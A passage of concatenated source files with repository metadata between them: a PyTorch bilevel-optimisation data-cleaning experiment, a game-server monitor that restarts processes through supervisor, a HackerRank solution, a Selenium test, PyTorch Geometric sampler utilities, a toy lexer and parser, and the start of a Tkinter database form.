retain_graph=retain_graph,
create_graph=create_graph)[0]
return grad
def g_w(x, w, dataset, retain_graph=False, create_graph=False):
loss = g(x, w, dataset)
grad = torch.autograd.grad(loss, w,
retain_graph=retain_graph,
create_graph=create_graph)[0]
return grad
def g_x_xhat_w(x, xhat, w, dataset, retain_graph=False, create_graph=False):
loss = g(x, w, dataset) - g(xhat.detach(), w, dataset)
grad = torch.autograd.grad(loss, [x, w],
retain_graph=retain_graph,
create_graph=create_graph)
return loss, grad[0], grad[1]
def g_x_xhat_w_bo(x, xhat, w, dataset, retain_graph=False, create_graph=False):
loss = g(x, w, dataset) - g(xhat, w, dataset)
grad = torch.autograd.grad(loss, [x, xhat, w],
retain_graph=retain_graph,
create_graph=create_graph)
return grad[0], grad[1], grad[2]
def f_x(x, w, dataset, retain_graph=False, create_graph=False):
loss = f(x, w, dataset)
grad = torch.autograd.grad(loss, x,
retain_graph=retain_graph,
create_graph=create_graph)[0]
return grad
### Define evaluation metric
def evaluate(x, testset):
with torch.no_grad():
test_x, test_y = testset
y = model_forward(x, test_x)
test_loss = F.cross_entropy(y, test_y).detach().item()
test_acc = y.argmax(-1).eq(test_y).float().mean().detach().cpu().item()
return test_loss, test_acc
def evaluate_importance_f1(w, clean_indices):
with torch.no_grad():
w_ = w.gt(0.5).float()
TP = (w_ * clean_indices.float()).sum()
recall = TP / (clean_indices.float().sum()+1e-4)
precision = TP / (w_.sum()+1e-4)
f1 = 2.0 * recall * precision / (recall + precision + 1e-4)
return precision.cpu().item(), recall.cpu().item(), f1.cpu().item()
###############################################################################
#
# Bilevel Optimization Training Methods
#
###############################################################################
def simple_train(args, x, data_x, data_y, testset, tag='pretrain', regularize=False): # directly train on the dataset
opt = torch.optim.SGD([x], lr=args.x_lr)
n = data_x.shape[0]
n_epochs = 5000
final_test_loss = np.inf
final_test_acc = 0.
best_x = None
for epoch in range(n_epochs):
opt.zero_grad()
y = model_forward(x, data_x)
loss = F.cross_entropy(y, data_y)
if regularize:
loss += 0.001 * x.norm(2).pow(2)
loss.backward()
opt.step()
test_loss, test_acc = evaluate(x, testset)
if test_loss <= final_test_loss:
final_test_loss = test_loss
final_test_acc = test_acc
best_x = x.data.clone()
print(f"[{tag}] epoch {epoch:5d} test loss {test_loss:10.4f} test acc {test_acc:10.4f}")
return final_test_loss, final_test_acc, best_x
def F2BA(args, x, w, trainset, valset, testset, clean_indices):
xhat = copy.deepcopy(x)
total_time = 0.0
n = trainset[0].shape[0]
stats = []
outer_opt = torch.optim.SGD([w], lr=args.w_lr)
inner_opt = torch.optim.SGD([
{'params': [x], 'lr': args.x_lr},
{'params': [xhat], 'lr': args.xhat_lr}])
for epoch in range(args.epochs):
xhat.data = x.data.clone()
t0 = time.time()
for it in range(args.iterations):
inner_opt.zero_grad()
gx = g_x(xhat, w, trainset)
fx = f_x(x, w, valset)
xhat.grad = args.lmbd * gx
x.grad = fx + args.lmbd * gx
inner_opt.step()
_, gx, gw_minus_gw_k = g_x_xhat_w(x, xhat, w, trainset)
outer_opt.zero_grad()
w.grad = args.lmbd * gw_minus_gw_k
outer_opt.step()
t1 = time.time()
total_time += t1 - t0
w.data.clamp_(0.0, 1.0)
test_loss, test_acc = evaluate(x, testset)
f1 = evaluate_importance_f1(w, clean_indices)
stats.append((total_time, test_loss, test_acc))
print(f"[info] epoch {epoch:5d} | te loss {test_loss:6.4f} | te acc {test_acc:4.2f} | time {total_time:6.2f} | w-min {w.min().item():4.2f} w-max {w.max().item():4.2f} | f1 {f1[2]:4.2f}")
return stats
def AID(args, x, w, trainset, valset, testset, clean_indices):
outer_loss = lambda x, w: f(x[0], w[0], valset)
inner_loss = lambda x, w, d: g(x[0], w[0], d)
inner_opt = hg.GradientDescent(inner_loss, args.x_lr, data_or_iter=trainset)
inner_opt_cg = hg.GradientDescent(inner_loss, 1., data_or_iter=trainset)
outer_opt = torch.optim.SGD([w], lr=args.w_lr)
total_time = 0.0
stats = []
for epoch in range(args.epochs):
t0 = time.time()
x_history = [[x]]
for it in range(args.iterations):
x_history.append(inner_opt(x_history[-1], [w], create_graph=False))
outer_opt.zero_grad()
hg.CG([x_history[-1][0]], [w], args.K, inner_opt_cg, outer_loss, stochastic=False, set_grad=True)
outer_opt.step()
t1 = time.time()
total_time += t1 - t0
w.data.clamp_(0.0, 1.0)
x.data = x_history[-1][0].data.clone()
test_loss, test_acc = evaluate(x, testset)
stats.append((total_time, test_loss, test_acc))
print(f"[info] epoch {epoch:5d} | te loss {test_loss:6.4f} | te acc {test_acc:4.2f} | time {total_time:6.2f} | w-min {w.min().item():4.2f} w-max {w.max().item():4.2f}")
return stats
def ITD(args, x, w, trainset, valset, testset, clean_indices):
outer_loss = lambda x, w: f(x[0], w[0], valset)
inner_loss = lambda x, w, d: g(x[0], w[0], d)
inner_opt = hg.GradientDescent(inner_loss, args.x_lr, data_or_iter=trainset)
outer_opt = torch.optim.SGD([w], lr=args.w_lr)
total_time = 0.0
stats = []
for epoch in range(args.epochs):
momentum = torch.zeros_like(x)
t0 = time.time()
x_history = [[x]]
for it in range(args.iterations):
x_history.append(inner_opt(x_history[-1], [w], create_graph=True))
outer_opt.zero_grad()
loss = outer_loss([x_history[-1][0]], [w])
grad = torch.autograd.grad(loss, w)[0]
w.grad = grad.data.clone()
outer_opt.step()
t1 = time.time()
total_time += t1 - t0
w.data.clamp_(0.0, 1.0)
x.data = x_history[-1][0].data.clone()
test_loss, test_acc = evaluate(x, testset)
stats.append((total_time, test_loss, test_acc))
print(f"[info] epoch {epoch:5d} | te loss {test_loss:6.4f} | te acc {test_acc:4.2f} | time {total_time:6.2f} | w-min {w.min().item():4.2f} w-max {w.max().item():4.2f}")
return stats
if __name__ == "__main__":
args = parse_args()
if args.pretrain is True: # preprocess data and pretrain a model on validation set
if not os.path.exists(args.data_path):
os.makedirs(args.data_path)
if not os.path.exists(args.model_path):
os.makedirs(args.model_path)
### generate data
trainset, valset, testset, old_train_y = get_data(args)
torch.save((trainset, valset, testset, old_train_y),
os.path.join(args.data_path, f"{args.dataset}_data_cleaning.pt"))
print(f"[info] successfully generated data to {args.data_path}/{args.dataset}_data_cleaning.pt")
### pretrain a model and save it
n_feats = np.prod(*trainset[0].shape[1:])
num_classes = trainset[1].unique().shape[-1]
args.device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
trainset = (trainset[0].to(args.device), trainset[1].to(args.device))
valset = (valset[0].to(args.device), valset[1].to(args.device))
testset = (testset[0].to(args.device), testset[1].to(args.device))
old_train_y = old_train_y.to(args.device)
x = get_model(n_feats, num_classes, args.device)
sd = x.data.clone()
# lower bound (train on noisy train + valset)
tmp_x = torch.cat([trainset[0], valset[0]], 0)
tmp_y = torch.cat([trainset[1], valset[1]], 0)
test_loss1, test_acc1, best_x1 = simple_train(args, x, tmp_x, tmp_y, testset, regularize=True)
torch.save(best_x1.data.cpu().clone(),
os.path.join(args.model_path, f"{args.dataset}_pretrained.pt"))
# a baseline: train on valset
x.data.copy_(sd)
test_loss2, test_acc2, best_x2 = simple_train(args, x, valset[0], valset[1], testset)
torch.save(best_x2.data.cpu().clone(),
os.path.join(args.model_path, f"{args.dataset}_pretrained_val.pt"))
# upper bound (train on correct train + valset)
x.data.copy_(sd)
tmp_x = torch.cat([trainset[0], valset[0]], 0)
tmp_y = torch.cat([old_train_y, valset[1]], 0)
test_loss3, test_acc3, best_x3 = simple_train(args, x, tmp_x, tmp_y, testset)
torch.save(best_x3.data.cpu().clone(),
os.path.join(args.model_path, f"{args.dataset}_pretrained_trainval.pt"))
print(f"[pretrained] noisy train + val : test loss {test_loss1} test acc {test_acc1}")
print(f"[pretrained] val : test loss {test_loss2} test acc {test_acc2}")
print(f"[pretrained] correct train + val : test loss {test_loss3} test acc {test_acc3}")
torch.save({
"pretrain_test_loss": test_loss1,
"pretrain_test_acc": test_acc1,
"pretrain_val_test_loss": test_loss2,
"pretrain_val_test_acc": test_acc2,
"pretrain_trainval_test_loss": test_loss3,
"pretrain_trainval_test_acc": test_acc3,
}, os.path.join(args.model_path, f"{args.dataset}_pretrained.stats"))
else: # load pretrained model on valset and then start model training
trainset, valset, testset, old_train_y = torch.load(
os.path.join(args.data_path, f"{args.dataset}_data_cleaning.pt"))
args.device = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
n_feats = np.prod(*trainset[0].shape[1:])
num_classes = trainset[1].unique().shape[-1]
trainset = (trainset[0].to(args.device), trainset[1].to(args.device))
valset = (valset[0].to(args.device), valset[1].to(args.device))
testset = (testset[0].to(args.device), testset[1].to(args.device))
old_train_y = old_train_y.to(args.device)
x = get_model(n_feats, num_classes, args.device)
x.data.copy_(torch.load(os.path.join(args.model_path, f"{args.dataset}_pretrained.pt")).to(args.device))
# load the pretrained model on validation set
pretrained_stats = torch.load(
os.path.join(args.model_path, f"{args.dataset}_pretrained.stats"))
test_loss1 = pretrained_stats['pretrain_test_loss']
test_loss2 = pretrained_stats['pretrain_val_test_loss']
test_loss3 = pretrained_stats['pretrain_trainval_test_loss']
test_acc1 = pretrained_stats['pretrain_test_acc']
test_acc2 = pretrained_stats['pretrain_val_test_acc']
test_acc3 = pretrained_stats['pretrain_trainval_test_acc']
print(f"[pretrained] noisy train + val : test loss {test_loss1} test acc {test_acc1}")
print(f"[pretrained] val : test loss {test_loss2} test acc {test_acc2}")
print(f"[pretrained] correct train + val : test loss {test_loss3} test acc {test_acc3}")
test_loss, test_acc = evaluate(x, testset)
print("original test loss ", test_loss, "original test acc ", test_acc)
clean_indices = old_train_y.to(args.device).eq(trainset[1])
w = torch.zeros(trainset[0].shape[0], requires_grad=True, device=args.device)
w.data.add_(0.5)
stats = eval(args.alg)(args=args,
x=x,
w=w,
trainset=trainset,
valset=valset,
testset=testset,
clean_indices=clean_indices)
if args.alg == 'F2BA':
save_path = f"./{args.model_path}/{args.dataset}_{args.alg}_k{args.iterations}_xlr{args.x_lr}_wlr{args.w_lr}_xhatlr{args.xhat_lr}_lmbd{args.lmbd}_sd{args.seed}"
else:
save_path = f"./{args.model_path}/{args.dataset}_{args.alg}_k{args.iterations}_xlr{args.x_lr}_wlr{args.w_lr}_xhatlr{args.xhat_lr}_sd{args.seed}"
torch.save(stats, save_path)
| TrueNobility303/F2BA | single_machine/data_cleaning.py | data_cleaning.py | py | 17,970 | python | en | code | 0 | github-code | 50 |
22948851168 | #!/usr/bin/env python2
import valve.source.a2s as a2s
import os
import sys
import socket
import time
import supervisor.xmlrpc
import xmlrpclib
supervisor_socket = "unix:///tmp/supervisor.sock"
try:
location = os.environ["LOCATION"]
if location not in ("DE", "IL", "AU", "NL"):
raise KeyError
except KeyError:
print("Invalid LOCATION env value.")
sys.exit()
if location == "DE":
SERVERS = {27960: "turbo1", 27961: "turbo2", 27962: "turbo3", 27963: "turbo4",
27970: "classic1", 27971: "classic2", 27972: "classic3", 27973: "classic4"}
elif location == "IL":
SERVERS = {27960: "turbo1", 27961: "turbo2", 27962: "turbo3", 27970: "classic1", 27971: "classic2"}
elif location == "AU":
SERVERS = {27960: "turbo1", 27961: "turbo2", 27970: "classic1", 27971: "classic2"}
else:
SERVERS = {27960: "turbo", 27961: "classic"}
def main():
offline = []
for port, name in sorted(SERVERS.items()):
info = get_server_info(port)
if info:
players = "{player_count}/{max_players}".format(**info)
print("{} (localhost:{}) is running {}".format(name, port, players))
else:
offline.append(port)
print("{} (localhost:{}) is offline. Will check again in 20 seconds.".format(name, port))
if offline:
time.sleep(20)
for port in offline:
info = get_server_info(port)
if info:
players = "{player_count}/{max_players}".format(**info)
print("{} (localhost:{}) is now running {}".format(SERVERS[port], port, players))
else:
print("{} (localhost:{}) is still offline. Restarting...".format(SERVERS[port], port))
group = SERVERS[port].rstrip("0123456789")
restart("{}:qzeroded_{}".format(group, SERVERS[port]))
def get_server_info(port):
try:
return a2s.ServerQuerier(("localhost", port), 1).get_info()
except a2s.NoResponseError:
return
def restart(process_name):
try:
transport = supervisor.xmlrpc.SupervisorTransport(serverurl=supervisor_socket)
server = xmlrpclib.ServerProxy("http://127.0.0.1", transport=transport)
if server.supervisor.getProcessInfo(process_name)["statename"] != "STOPPED":
server.supervisor.stopProcess(process_name)
server.supervisor.startProcess(process_name)
print("{} was restarted!".format(process_name))
else:
print("{} is stopped so not restarting.".format(process_name))
except socket.error:
print("Error connection to supervisor.")
except xmlrpclib.Fault:
print("Invalid process name({}).".format(process_name))
if __name__ == "__main__":
main()
| QLRace/server-settings | server_monitor.py | server_monitor.py | py | 2,764 | python | en | code | 2 | github-code | 50 |
70204237595 | #This solution gives 100% accuracy
#!/bin/python3
import math
import os
import random
import re
import sys
import decimal
#
# Complete the 'plusMinus' function below.
#
# The function accepts INTEGER_ARRAY arr as parameter.
#
def plusMinus(arr):
length_arr = len(arr)
positive_num_length = len(list(filter(lambda x: x>0,arr)))
negative_num_length = len(list(filter(lambda x: x<0,arr)))
zero_num_length = len(list(filter(lambda x: x==0,arr)))
positive_result = decimal.Decimal(positive_num_length)/decimal.Decimal(length_arr)
positive_result = round(positive_result,6)
negative_result = decimal.Decimal(negative_num_length)/decimal.Decimal(length_arr)
negative_result = round(negative_result,6)
zero_result = decimal.Decimal(zero_num_length)/decimal.Decimal(length_arr)
zero_result = round(zero_result,6)
print(positive_result)
print(negative_result)
print(zero_result)
if __name__ == '__main__':
n = int(input().strip())
arr = list(map(int, input().rstrip().split()))
plusMinus(arr)
| M-Umr/Python_Language_Prepration | HackerRank/plus_minus.py | plus_minus.py | py | 1,090 | python | en | code | 1 | github-code | 50 |
12359666247 | import unittest
from selenium.webdriver.chrome.service import Service
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.by import By
class RegisterNewUser(unittest.TestCase):
@classmethod
def setUp(cls) -> None:
service = Service(executable_path="./chromedriver.exe")
cls.driver = webdriver.Chrome(service=service)
driver = cls.driver
driver.maximize_window()
driver.get("http://demo-store.seleniumacademy.com/")
driver.implicitly_wait(15)
def test_select_language(self):
exp_options = ['English', 'French', 'German']
act_options = []
select_language = Select(self.driver.find_element(by=By.ID, value="select-language"))
self.assertEqual(len(exp_options), len(select_language.options))
for option in select_language.options:
act_options.append(option.text)
self.assertListEqual(exp_options, act_options)
self.assertEqual('English', select_language.first_selected_option.text)
select_language.select_by_visible_text("German")
self.assertTrue("store=german" in self.driver.current_url)
select_language = Select(self.driver.find_element(by=By.ID, value="select-language"))
select_language.select_by_index(0)
@classmethod
def tearDown(cls) -> None:
cls.driver.implicitly_wait(15)
cls.driver.quit()
if __name__ == '__main__':
unittest.main(verbosity=2)
| Kerepakupai/seleniumProject | select_language.py | select_language.py | py | 1,510 | python | en | code | 0 | github-code | 50 |
21643310861 | import shutil
import glob
import subprocess
import os
import pandas as pd
'''by James C. Hu
This script will:
1) peform ivar variant calling on all bam files within a directory.
2) Pull and combine variant data based on locations given by input file.
'''
# pandas terminal output options
pd.options.display.max_columns = 15
pd.options.display.width = 1000
def run_iVar_varaints(in_directory: str, out_directory: str, ref_gene_fa: str, reg_gene_gff3: str) -> None:
'''
This function will peform ivar variant analysis on all bam files within a given directory.
'''
for file in os.listdir(in_directory):
if file.endswith('.bam'):
subprocess.call(
f'samtools mpileup -d 0 -A -aa -q 0 -Q 0 -R {in_directory}/{file} | ivar variants -p {out_directory}/{file[:7]}_iVAR -q 20 -t 0 -r {ref_gene_fa} -g {reg_gene_gff3}', shell=True)
return None
def iVar_variant_search(in_file: str, target_nts: list) -> pd.DataFrame:
'''
This function will take nt positional arguments as an input and consolidate the ivar outputs for those locations.
'''
seq_id = in_file.split('/')[2].split('_')[0]
df_in = pd.read_csv(in_file, sep='\t')
df_out = df_in[df_in['POS'].isin(target_nts)]
df_out['REGION'] = seq_id
if len(df_out) > 0:
return df_out
os.mkdir('../bam_files')
os.chdir('../')
bam_files = glob.glob('**/I*/*sortedTrimmed.bam')
for file in bam_files:
shutil.copy(file, 'bam_files')
os.chdir('ivar_output')
os.mkdir('../ivar_output')
run_iVar_varaints('../bam_files', '../ivar_output', 'MN908947.3.fasta', 'MN908947.3.gff3')
target_nts = pd.read_csv('nt_positions_infile.csv')['NT_position'].copy().to_list()
ivar_output_files = [file for file in os.listdir('../ivar_output') if file.endswith('iVAR.tsv')]
ivar_output_files.sort()
df_out = pd.DataFrame()
log_file = '../ivar_output/ivar_log.txt'
for file in ivar_output_files:
print('\n============================')
print(f'Searching for mutations in: {file}')
print('============================\n')
temp_df = iVar_variant_search(f'../ivar_output/{file}', target_nts)
df_out = pd.concat([df_out, temp_df])
df_out = df_out.set_index('REGION')
df_out = df_out.sort_values('POS').sort_values('REGION')
df_out.to_csv('../ivar_output/combined_ivar_output.csv')
| ASU-Lim-Lab/Variant_calling | Variant_calling/ivar_covidseq.py | ivar_covidseq.py | py | 2,324 | python | en | code | 0 | github-code | 50 |
34650130706 | # 3D柱状图
import random
from pyecharts import options as opts
from pyecharts.charts import Bar3D
# 生成测试数据
data = [[x, y, random.randint(10, 40)] for y in range(7) for x in range(24)]
hours = ['12am', '1am', '2am', '3am', '4am', '5am', '6am', '7am', '8am', '9am', '10am', '11am', '12pm', '1pm', '2pm', '3pm', '4pm', '5pm', '6pm', '7pm', '8pm', '9pm', '10pm', '11pm']
weeks = ['星期六','星期五','星期四','星期三','星期二','星期一','星期日']
c = (
Bar3D(init_opts=opts.InitOpts(width='1200px', height='600px'))
.add(
'',
data,
xaxis3d_opts=opts.Axis3DOpts(name='小时', type_="category", data=hours),
yaxis3d_opts=opts.Axis3DOpts(name='星期', type_="category", data=weeks),
zaxis3d_opts=opts.Axis3DOpts(name='温度', type_="value"),
# grid3d_opts=opts.Grid3DOpts(width=200, depth=80, rotate_speed=30),
)
.set_global_opts(
visualmap_opts=opts.VisualMapOpts(max_=50, min_=0),
title_opts=opts.TitleOpts(title='Q市7x24小时温度'),
)
.render('./3D柱状图2.html')
)
| dairui2/MATLAB | chapter10/10.3.py | 10.3.py | py | 1,115 | python | en | code | 1 | github-code | 50 |
15960309264 | import copy
from typing import Any, Dict, Optional, Set, Tuple, Union
import torch
from torch import Tensor
from torch_scatter import scatter_min
from torch_geometric.data import Data, HeteroData
from torch_geometric.data.storage import EdgeStorage
from torch_geometric.typing import EdgeType, OptTensor
# Edge Layout Conversion ######################################################
# TODO(manan) deprecate when FeatureStore / GraphStore unification is complete
def to_csc(
data: Union[Data, EdgeStorage],
device: Optional[torch.device] = None,
share_memory: bool = False,
is_sorted: bool = False,
) -> Tuple[Tensor, Tensor, OptTensor]:
# Convert the graph data into a suitable format for sampling (CSC format).
# Returns the `colptr` and `row` indices of the graph, as well as an
# `perm` vector that denotes the permutation of edges.
# Since no permutation of edges is applied when using `SparseTensor`,
# `perm` can be of type `None`.
perm: Optional[Tensor] = None
if hasattr(data, 'adj'):
colptr, row, _ = data.adj.csc()
elif hasattr(data, 'adj_t'):
colptr, row, _ = data.adj_t.csr()
elif data.edge_index is not None:
(row, col) = data.edge_index
if not is_sorted:
perm = (col * data.size(0)).add_(row).argsort()
row = row[perm]
colptr = torch.ops.torch_sparse.ind2ptr(col[perm], data.size(1))
else:
row = torch.empty(0, dtype=torch.long, device=device)
colptr = torch.zeros(data.num_nodes + 1, dtype=torch.long,
device=device)
colptr = colptr.to(device)
row = row.to(device)
perm = perm.to(device) if perm is not None else None
if not colptr.is_cuda and share_memory:
colptr.share_memory_()
row.share_memory_()
if perm is not None:
perm.share_memory_()
return colptr, row, perm
def to_hetero_csc(
data: HeteroData,
device: Optional[torch.device] = None,
share_memory: bool = False,
is_sorted: bool = False,
) -> Tuple[Dict[str, Tensor], Dict[str, Tensor], Dict[str, OptTensor]]:
# Convert the heterogeneous graph data into a suitable format for sampling
# (CSC format).
# Returns dictionaries holding `colptr` and `row` indices as well as edge
# permutations for each edge type, respectively.
colptr_dict, row_dict, perm_dict = {}, {}, {}
for store in data.edge_stores:
key = store._key
out = to_csc(store, device, share_memory, is_sorted)
colptr_dict[key], row_dict[key], perm_dict[key] = out
return colptr_dict, row_dict, perm_dict
# Edge-based Sampling Utilities ###############################################
def add_negative_samples(
edge_label_index,
edge_label,
edge_label_time,
num_src_nodes: int,
num_dst_nodes: int,
negative_sampling_ratio: float,
):
"""Add negative samples and their `edge_label` and `edge_time`
if `neg_sampling_ratio > 0`"""
num_pos_edges = edge_label_index.size(1)
num_neg_edges = int(num_pos_edges * negative_sampling_ratio)
if num_neg_edges == 0:
return edge_label_index, edge_label, edge_label_time
neg_row = torch.randint(num_src_nodes, (num_neg_edges, ))
neg_col = torch.randint(num_dst_nodes, (num_neg_edges, ))
neg_edge_label_index = torch.stack([neg_row, neg_col], dim=0)
if edge_label_time is not None:
perm = torch.randperm(num_pos_edges)
edge_label_time = torch.cat(
[edge_label_time, edge_label_time[perm[:num_neg_edges]]])
edge_label_index = torch.cat([
edge_label_index,
neg_edge_label_index,
], dim=1)
pos_edge_label = edge_label + 1
neg_edge_label = edge_label.new_zeros((num_neg_edges, ) +
edge_label.size()[1:])
edge_label = torch.cat([pos_edge_label, neg_edge_label], dim=0)
return edge_label_index, edge_label, edge_label_time
def set_node_time_dict(
node_time_dict,
input_type: EdgeType,
edge_label_index,
edge_label_time,
num_src_nodes: int,
num_dst_nodes: int,
):
"""For edges in a batch replace `src` and `dst` node times by the min
across all edge times."""
def update_time_(node_time_dict, index, node_type, num_nodes):
node_time_dict[node_type] = node_time_dict[node_type].clone()
node_time, _ = scatter_min(edge_label_time, index, dim=0,
dim_size=num_nodes)
# NOTE We assume that node_time is always less than edge_time.
index_unique = index.unique()
node_time_dict[node_type][index_unique] = node_time[index_unique]
node_time_dict = copy.copy(node_time_dict)
update_time_(node_time_dict, edge_label_index[0], input_type[0],
num_src_nodes)
update_time_(node_time_dict, edge_label_index[1], input_type[-1],
num_dst_nodes)
return node_time_dict
###############################################################################
def remap_keys(
original: Dict,
mapping: Dict,
exclude: Optional[Set[Any]] = None,
) -> Dict:
exclude = exclude or set()
return {(k if k in exclude else mapping[k]): v
for k, v in original.items()}
| myhz0606/pytorch_geometric | torch_geometric/sampler/utils.py | utils.py | py | 5,280 | python | en | code | null | github-code | 50 |
31175971463 | from re import split
from typing import Optional, Self
def contains_item_at_every_pos(string, items):
for i in range(len(string)):
found_match = False
for item in items:
if string[i] == item:
found_match = True
break
if not found_match:
return False
return True
class Type:
def __init__(self, name: str, type_category: Optional[Self] = None) -> None:
self.name = name
self.type_category = type_category
def __repr__(self) -> str:
type_ = self
lst = [self.name]
while type_.type_category is not None:
lst.append(type_.type_category.name)
type_ = type_.type_category
lst.reverse()
return ":".join(lst)
def __call__(self, val):
return Token(self, val)
def __hash__(self) -> int:
return hash(self.name)
UNKNOWN = Type("UNKNOWN")
KEYWORD = Type("KEYWORD")
TYPE = Type("TYPE", KEYWORD)
VALUE = Type("VALUE")
NUM = Type("NUM", VALUE)
FRAC = Type("FRAC", NUM)
LST = Type("LST", VALUE)
STR = Type("STR", VALUE)
OPERATOR = Type("OPERATOR")
class IdToken:
tokens: list[Self] = []
def __init__(self, type_: Type, values: str | list[str]) -> None:
self.type_ = type_
self.values = values
type(self).tokens.append(self)
if isinstance(values, str):
self.value = values
NUMBER = list("1234567890.")
IdToken(TYPE, "num")
IdToken(TYPE, "frac")
IdToken(OPERATOR, "=")
IdToken(OPERATOR, "/")
IdToken(OPERATOR, "-")
IdToken(NUM, NUMBER)
class Token:
def __init__(self, type_: Type, value: str) -> None:
self.type_ = type_
self.value = value
def __repr__(self) -> str:
return repr(self.type_) + f'("{self.value}")'
def __eq__(self, __value: Self) -> bool:
return str(self) == str(__value)
def __hash__(self) -> int:
return hash(str(self.type_) + str(self.value))
class Lexer:
def __init__(self, code) -> None:
self.code = code.replace(" ", "")
def split(self):
"""Split the code into pieces based of the IdTokens"""
pattern = (
"("
+ "|".join(
token.value for token in IdToken.tokens if hasattr(token, "value")
)
+ ")"
)
self.splits = list(
filter(
None,
split(
pattern,
self.code,
),
)
)
def lex(self):
"""Covert the split pieces into Token objects"""
tokens = []
for token in self.splits:
for token_ in IdToken.tokens:
if token == token_.values or contains_item_at_every_pos(
token, token_.values
):
tokens.append(Token(token_.type_, token))
break
else:
tokens.append(Token(UNKNOWN, token))
self.tokens: list[Token] = tokens
return tokens
def stop_keywords_in_names(self, types: tuple[Type, ...]):
"""
Turns this
```
int varint = 5 -> TYPE("int"), TYPE("var"), TYPE("int"), OPERATOR("="), NUM("5")
```
Into this
```
int varint = 5 -> TYPE("int"), TYPE("varint"), OPERATOR("="), NUM("5")
"""
def remove_and_add_duplicates(lst):
seen = set()
for i in range(len(lst)):
if lst[i].type_ in types:
if lst[i] in seen:
lst[i - 1].value += lst[i].value
lst.pop(i)
break
else:
seen.add(lst[i])
remove_and_add_duplicates(self.tokens)
def fractions_combine(self):
pre = 0
next_ = 0
for i in range(len(self.tokens)):
pre = i - 1
next_ = i + 1
if i > 0 and i < len(self.tokens):
if (
self.tokens[pre].type_ is NUM
and self.tokens[i] == OPERATOR("/")
and self.tokens[next_].type_ is NUM
):
value = (
self.tokens[pre].value
+ self.tokens[i].value
+ self.tokens[next_].value
)
self.tokens.pop(pre)
self.tokens.pop(i - 1)
self.tokens.pop(next_ - 2)
self.tokens.insert(
i,
Token(
FRAC,
value,
),
)
def combine(self, converts: dict[tuple[Type | Token], Type | Token]) -> None:
"""
Combine types and tokens into one token.
```
[NUM('1'), OPERATOR('/'), NUM('2')]
>>> lexer.combine({(NUM, OPERATOR("/"), NUM): FRAC)})
[FRAC('1/2')]
"""
max_len = max([len(lst) for lst in list(converts.keys())])
indexes = [0 for _ in range(max_len)]
for i in range(len(self.tokens)):
if not i < len(self.tokens) - 2: # ?
continue
for j in range(max_len):
indexes[j] = i + j
for lst, to in list(converts.items()):
conditions = []
for i, condition in enumerate(lst):
if isinstance(condition, Type):
conditions.append(self.tokens[indexes[i]].type_ is condition)
elif isinstance(condition, Token):
conditions.append(self.tokens[indexes[i]] == condition)
if not all(conditions):
continue
value = ""
for i in range(len(lst)):
value += self.tokens[indexes[i]].value
for _ in range(len(lst)):
self.tokens.pop(indexes[0])
if isinstance(to, Type):
self.tokens.insert(
indexes[0],
Token(
to,
value,
),
)
elif isinstance(to, Token):
self.tokens.insert(indexes[0], to)
print(Token(OPERATOR, "/") is OPERATOR("/"))
code = input(">>> ")
lexer = Lexer(code)
lexer.split()
lexer.lex()
lexer.stop_keywords_in_names((TYPE,))
lexer.combine({(NUM, OPERATOR("/"), NUM): FRAC, (FRAC, OPERATOR("/"), NUM): FRAC})
print(lexer.tokens)
class Parser:
globals_ = {}
def __init__(self, lexer: Lexer) -> None:
self.lexer = lexer
self.pos = 0
self.current_token = self.lexer.tokens[self.pos]
def advance(self):
self.pos += 1
self.current_token = self.lexer.tokens[self.pos]
return self.current_token
def parse(self):
x = ""
for token in self.lexer.tokens:
if token.type_ is NUM or token.type_ is OPERATOR:
x += token.value
# self.advance()
print(x)
print(eval(x))
# if token.type_ is TYPE: # VARIABLE
# name = self.advance()
# self.advance()
# value = self.advance()
parser = Parser(lexer)
parser.parse()
| PythonDominator/Pybattle | lexer.py | lexer.py | py | 7,457 | python | en | code | 8 | github-code | 50 |
11956147421 | import numpy as np
import cv2
import os
fname = 'image' # folder name
def getcurpath():
return os.path.dirname(os.path.abspath(__file__))
curpath = getcurpath()
imagepath = os.path.join(curpath, fname)
imname = '%s\Cattura.png' % (imagepath)
img = cv2.imread(imname, 0)
cv2.imshow('image', img)
k = cv2.waitKey(0)
if k == 27:
cv2.destroyAllWindows()
elif k == ord('s'):
cv2.imwrite('messigray.png', img)
cv2.destroyAllWindows()
| StormFox23/playground-python | image/vision/main.py | main.py | py | 448 | python | en | code | 2 | github-code | 50 |
40033668017 | from pymongo.cursor import Cursor
from app.database.database import DbManager
from app.database.models import Activity, User
from app.config import Settings
class ActivitiesManager(DbManager):
def __init__(self, settings: Settings, user: User) -> None:
super().__init__(settings.mongodb_host, settings.mongodb_port)
self._user = user
def get(self) -> list[Activity]:
filter: dict[str, any] = {"username": self._user.username}
if self._query_builder and "dates_between" in self._query_builder.get_query():
filter["session.timestamp"] = (
self._query_builder.get_query()["dates_between"]
)
activities: Cursor = self._client.activity.find(filter).sort(
"session.timestamp", 1
)
return [Activity(**activity) for activity in activities]
| rgmf/fit_galgo_api | app/database/activities.py | activities.py | py | 854 | python | en | code | 0 | github-code | 50 |
28076246722 | # -*- coding: utf-8 -*-
"""
@Author 坦克手贝塔
@Date 2023/5/7 14:24
"""
from collections import Counter
from typing import List
"""
"""
"""
思路:如果一个数对 (a,b) 之和能被 60 整除,即 (a+b)mod60=0,那么 (amod60+bmod60)mod60=0,不妨记 x=amod60, y=bmod60,那么有
(x+y)mod60=0,即 y=(60−x)mod60。因此,我们可以遍历歌曲列表,用一个长度为 60 的数组 cnt 记录每个余数 x 出现的次数。对于当前的
x,如果数组 cnt 中存在余数 y=(60−x)mod60,那么将 cnt[y] 累加进答案中。然后,将 x 在数组 cnt 中的出现次数加 1。继续遍历,直到
遍历完整个歌曲列表。
"""
class Solution:
@staticmethod
def numPairsDivisibleBy60(time: List[int]) -> int:
cnt = Counter()
ans = 0
for x in time:
x %= 60
y = (60 - x) % 60
ans += cnt[y]
cnt[x] += 1
return ans
| TankManBeta/LeetCode-Python | problem1010_medium.py | problem1010_medium.py | py | 957 | python | zh | code | 0 | github-code | 50 |
40428441663 | from tkinter import *
import pymysql
from tkinter import messagebox
top = Tk()
top.title('DataBase Interface')
L1 = Label(text="First Name")
L1.place(x=10,y=10)
L1.pack()
E1 = Entry(bd = 5)
E1.pack()
L2 = Label(text = "Last Name")
L2.place(x=10,y=500)
L2.pack()
E2 = Entry(bd = 5)
E2.pack()
def getcontent():
E1content = E1.get()
E2content = E2.get()
